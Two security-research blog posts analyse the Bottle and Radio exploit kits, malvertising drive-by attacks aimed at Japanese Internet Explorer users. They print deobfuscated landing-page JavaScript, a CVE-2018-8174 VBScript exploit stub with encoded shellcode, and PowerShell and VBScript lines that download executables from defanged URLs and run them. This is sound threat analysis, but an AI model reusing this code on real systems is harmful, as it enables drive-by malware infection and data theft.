Say hello to Bottle Exploit Kit targeting Japan


On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but observed other interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active at least in September 2019. This time we introduce BottleEK.

Sample traffic data is here.


We have confirmed that we are redirected to BottleEK by malvertising. When you are redirected from ad-network to BottleEK, the landing page html is loaded first. The landing page loads two JavaScipt files.

<!doctype html>
<html lang="ja">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
<link href="file/style.css" rel="stylesheet" type="text/css"/>
<body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif">
<div id="main" class="main"></div>
<script type="text/javascript" src="file/ajax.min.js"></script>
<script type="text/javascript" src="file/main.js"></script>

“ajax.min.js” is a JavaScript file for communication. It is used once to get the exploit code URL. Since it’s not important, we will omit it this time. Please remember only this code.

function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)

Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection. Reading everything is not easy… First, a large array is defined. This looks like a Base64 string, but base64_decode doesn’t make any meaningful data. To decrypt this, you need to read two processes.

var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ...

The first process is to swap the order of the arrays. This is code like this:

var _0x5906e4 = function (_0x35d916) {
    while (--_0x35d916) {

/* --- Snip --- */

var _0x29fbca = {
    'getCookie': function (_0xa8b74, _0x1731ce) {
        _0xa8b74 = _0xa8b74 || function (_0x1e7379) {
            return _0x1e7379;
        var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
        var _0x3ff1ff = function (_0xf3a699, _0x2d4894) {
        _0x3ff1ff(_0x5906e4, _0x3c6c93);
        return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined;

_0x29fbca['getCookie'](null, 'counter');

Next, the array data with the order changed is decoded. This is the code for decryption. A combination of Base64, URL Encode and RC4.

var decode = function (enc_data, key) {
    var a = [],
        b = 0,
        c, d = '',
        e = '';

    enc_data = atob(enc_data);
    for (var i = 0, length = enc_data['length']; i < length; i++) {
        e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2);
    enc_data = decodeURIComponent(e);
    for (var i = 0; i < 256; i++) {
        a[i] = i;

    /* RC4 */
    for (i = 0; i < 256; i++) {
        b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;

    i = 0;
    b = 0;
    for (var j = 0; j < enc_data['length']; j++) {
        i = (i + 1) % 256;
        b = (b + a[i]) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;
        d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]);

    return d;

This decrypts the array data and executes the main process.

First, check that username is set in the cookie. If it is set, processing ends. If not, set cookie username=bingv and the attack will continue.

var user = getCookie('username');
if (user == '') {
    setCookie('username', 'bingv', 0x1);

Next, check user environment. This is one of the most characteristic codes of the Bottle Exploit Kit.

var chk = checkEnv();

checkEnv gets the browser language setting. If it is not Japanese, display a dummy html and end.

function checkEnv() {
    var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase']();
    if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0;
document['getElementById']('main')['innerHTML'] = "<h1>Customer Login</h1><form><input type='text'value='User'><input type='password'><input type='submit'value='Submit'></form>";

And, browser information is acquired by User-Agent. If it is not Internet Explorer, display a dummy html and end in the same way.

var _0x100f15 = navigator['userAgent'];
var _0xed2c96 = _0x100f15['indexOf']('compatible') > -0x1 && _0x100f15['indexOf']('MSIE') > -0x1;
var _0x4d34a9 = _0x100f15['indexOf']('Trident') > -0x1 && _0x100f15['indexOf']('rv:11.0') > -0x1;
if (_0xed2c96) {
    if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) {
        var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);");
        var _0x50d3cb = parseFloat(RegExp['$1']);
        return _0x50d3cb;
    } else {
        _0x53ccba(this, function () {
            var _0x2e6966 = new RegExp("function *\( *\)");
            var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i');
            var _0x4fc827 = _0x118083('init');
            if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) {
            } else {

If these checks are passed, the image is displayed. The 1.gif used at this time is an image of the bottle. The str1 displayed below the image is Japanese.

var str1 = '読み込み中。 。 。 お待ちください&nbsp;&nbsp;&nbsp;&nbsp;';

/* --- Snip --- */

if (chk > 0x0) {
    var myimg = document['createElement']('img');
    myimg['setAttribute']('id', 'ldimg');
    myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline');
    myimg['setAttribute']('src', 'file/1.gif');
    var myp = document['createElement']('p');
    myp['setAttribute']('id', 'ldpr');
    myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;');
    for (var i = 0x0; i <= LOAD_SECOND; i++) {
        var progress = Math['round'](i * 0x64 / LOAD_SECOND);
        (function (_0x368e63) {
            setTimeout(function () {
                change_progress(_0x368e63, str1);
            }, i * 0x3e8);

And it gets the exploit code. Three parameters are used at that time.

  1. Internet Explorer version
  2. is 64bit
  3. Adobe Flash Player version
var is64 = 0x0;
if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1;
var fls = flashChecker();
    'type': 'GET',
    'dataType': 'jsonp',
    'timeOut': 0x2710,
    'url': '/conn.php?callback=?',
    'data': {
        'data1': chk,
        'data2': is64,
        'data3': fls['v']

When send this request, use the ajax.min.js you read earlier. Therefore, callback is added at the end.

function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)

If successful, read the exploit code using the response data. When exploiting the vulnerability of Internet Explorer, read file/vbs.vbs, and when exploiting the vulnerability of Adobe Flash Player, read file/swf.swf.

'success': function (_0x2ad29a) {
    if (_0x2ad29a[0x1] != '') {
        if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) {
            var _0x5517a0 = document['createElement']('embed');
            _0x5517a0['src'] = _0x2ad29a[0x1];
            _0x5517a0['setAttribute']('style', 'width:1px; height:1px');
        } else {
            var _0x33b1ee = cname + '=';
            var _0x3a1f81 = document['cookie']['split'](';');
            for (var _0x2e7aac = 0x0; _0x2e7aac < _0x3a1f81['length']; _0x2e7aac++) {
                var _0x446c09 = _0x3a1f81[_0x2e7aac];
                while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1);
                if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']);
            return '';
    } else if (_0x2ad29a[0x0] != '') {
        var _0x5a39f4 = document['createElement']('script');
        _0x5a39f4['type'] = 'text/vbscript';
        _0x5a39f4['src'] = _0x2ad29a[0x0];

vbs.vbs exploits CVE-2018-8174 and swf.swf exploits CVE-2018-15982.


vbs.vbs is a simple string encoding. Decoding this will give you almost the same code as the PoC.

Sub StartExploit
SetMemValue GetShellcode()
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
SetMemValue ExpandWithVirtualProtect(lIlll)
End Sub

This is the shellcode that is running.

Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c17%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &lIIII(IIIII("")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
End Function


swf.swf is almost the same as PoC.

   import com.adobe.tvsdk.mediacore.metadata.Metadata;
   import flash.display.Sprite;
   import flash.system.Capabilities;
   import flash.utils.ByteArray;
   import flash.utils.Endian;
   public class Main extends Sprite

The executed shellcode is the same as CVE-2018-8174.


The shellcode downloads and executes malware just like other EKs. The malware is not encrypted.

The shellcode was encoded by Shikata Ga Nai Encoder.

The decoded shellcode is a simple code that downloads and executes a malwre. The list of APIs to use is as follows:

The API hashing algorithm is imul83hAdd.

Interestingly, the URL string of the download destination was created as a mutex.

The malware is created as svchost.exe in% temp% and then executed with the WinExe function.


The malware is probably unique. We have never seen this elsewhere. According to my friend @VK_Intel, this could be a stealer targeting Japan.

These are the characteristics of this malware.


Bottle Exploit Kit is an exploit kit targeting Japan. It’s not as sophisticated as the Exploit Kit, but JavaScript is elaborate. It has been observed for at least three months ago, and its activity continues today. The vulnerabilities it exploits are the same as other EKs. The same should be noted. Keep an eye on trend of it.

Many people helped with our research. Special thanks to @kafeine and @VK_Intel.


Weak Drive-by Download attack with "Radio Exploit Kit"


Since July 11 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”.

Malvertising -> Unknown EK🚀 -> #AZORult
(CC: @malware_traffic, @jeromesegura, @BleepinComputer)

— nao_sec (@nao_sec) 2019年7月11日

The Radio Exploit Kit is not advanced. It exploits a very used vulnerability CVE-2016-0189. The exploit kit code is also unrefined. It is simply sending in malware (we are observing AZORult) using PoC of CVE-2016-0189. We don’t expect this to be a real threat. Most ordinary people will not be affected by this. However, I write this article because it is often observed in Japan. Be aware that these threats exist.


This exploit kit is in the process of growing. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. Here we introduce v1.0, 1.1 and 1.2.0.

Version First seen          2nd URL
1.0     2019-07-11_10-00    https[:]//
1.1     2019-07-12-20-00    http[:]//
1.2.0   2019-07-13_14-00    http[:]//
1.2.1   2019-07-13_15-00    http[:]//
1.2.2   2019-07-14_13-00    http[:]//
1.2.3   2019-07-14_20-00    http[:]//


First, let’s look at v1.0. It is the traffic when we first encountered Radio EK.

When redirected from the ad-network to https [:] //, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this.

Set Object = CreateObject("Shell.Application")
Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//','documentation.vbs');Start-Process 'documentation.vbs'"

This will generate a second traffic. image.vbs2 is a very simple code.

mm = "h"
nn = "t"
bb = "/"
vv = ":"
cc = "p"
x = "."
zz = "vbs"
q = "0"
w = "1"
e = "2"
r = "3"
t = "4"
y = "5"
u = "6"
a = "7"
s = "8"
f = "9"

strr = mm&nn&nn&cc&vv&bb&bb
rrts = t&y&x&w&e&x&e&w&y&x&w&y&a&bb
rprt = strr&rrts

d.Add "1", ""&rprt&"src/load2.jpg|"&temp&"\temp.vbs"
Set x = CreateObject("MSXML2.XMLHTTP")
For Each i In d "GET", Split(d.Item(i), "|")(0), false

This will load load2.jpg. load2.jpg is also a simple code.

Set css = CreateObject("WScript.Shell")
css = "http[:]//"
ico = ".exe"
css1 = "temp" & rand(1, 100)
css2 = "temp" & rand(101, 200)
css3 = "temp" & rand(201, 300)
css4 = "temp" & rand(301, 400)
css5 = "temp" & rand(401, 500)

Set oShell = CreateObject( "WScript.Shell" )
Dim good
Set good = CreateObject("WScript.Shell")
good = 200
set d = CreateObject("Scripting.Dictionary")

d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & ""
Set ar1 = CreateObject("MSXML2.XMLHTTP")
For Each i In d "GET", Split(d.Item(i), "|")(0), false
If ar1.Status = good Then
With CreateObject("ADODB.Stream")
.Type = 1
.Write ar1.ResponseBody
.Position = 0
.SaveToFile Split(d.Item(i), "|")(1), 2
End With
set WshShell = WScript.CreateObject("Wscript.Shell")
WshShell.Run temp & ""& css1 &"" & ico & "", ,true
End If

This process is repeated from 1.jpg to 5.jpg in order. The 1.jpg downloaded and executed in this way is malware. Malware is unencrypted and is plain binary.


Next, let’s look at v1.1.

For v1.1, the code executed by CVE-2016-0189 is as follows:

Set Object = CreateObject("Shell.Application")
Object.ShellExecute "PowerShell",  "(New-Object System.Net.WebClient).DownloadString('https[:]//');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2"

Unlike v1.0, the VBScript URL to be loaded next is http[:]// At this time, the end of the URL is .jp. I don’t know if this is a mistake in hitting jpg or meaning Japan. will execute code similar to v1.0 load2.jpg.

Set css = CreateObject("WScript.Shell")
css = "http[:]//"
ico = ".exe"
css1 = "temp" & rand(1, 100)
css2 = "temp" & rand(101, 200)
css3 = "temp" & rand(201, 300)
css4 = "temp" & rand(301, 400)
css5 = "temp" & rand(401, 500)

Set oShell = CreateObject( "WScript.Shell" )
Dim good
Set good = CreateObject("WScript.Shell")
good = 200
set d = CreateObject("Scripting.Dictionary")

d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & ""
Set ar1 = CreateObject("MSXML2.XMLHTTP")
For Each i In d "GET", Split(d.Item(i), "|")(0), false
If ar1.Status = good Then
With CreateObject("ADODB.Stream")
.Type = 1
.Write ar1.ResponseBody
.Position = 0
.SaveToFile Split(d.Item(i), "|")(1), 2
End With
set WshShell = WScript.CreateObject("Wscript.Shell")
WshShell.Run temp & ""& css1 &"" & ico & "", ,true
End If

This is also repeated until /im/5.jpg. The downloaded / executed /im/1.jpg is malware. As in v1.0, malware is not encrypted.


Finally, let’s look at v1.2.

It became very simple. It can be said that nothing is over. The code executed by CVE-2016-0189 is as follows:

Set Object = CreateObject("Shell.Application")
Object.ShellExecute "PowerShell",  "(New-Object System.Net.WebClient).DownloadString('https[:]//');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2"

Thus, /im/1.jpg downloaded and executed is malware. As before, malware is not encrypted.

The path of /im/1.jpg has only changed since v1.2.0. The essential process is the same.


Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.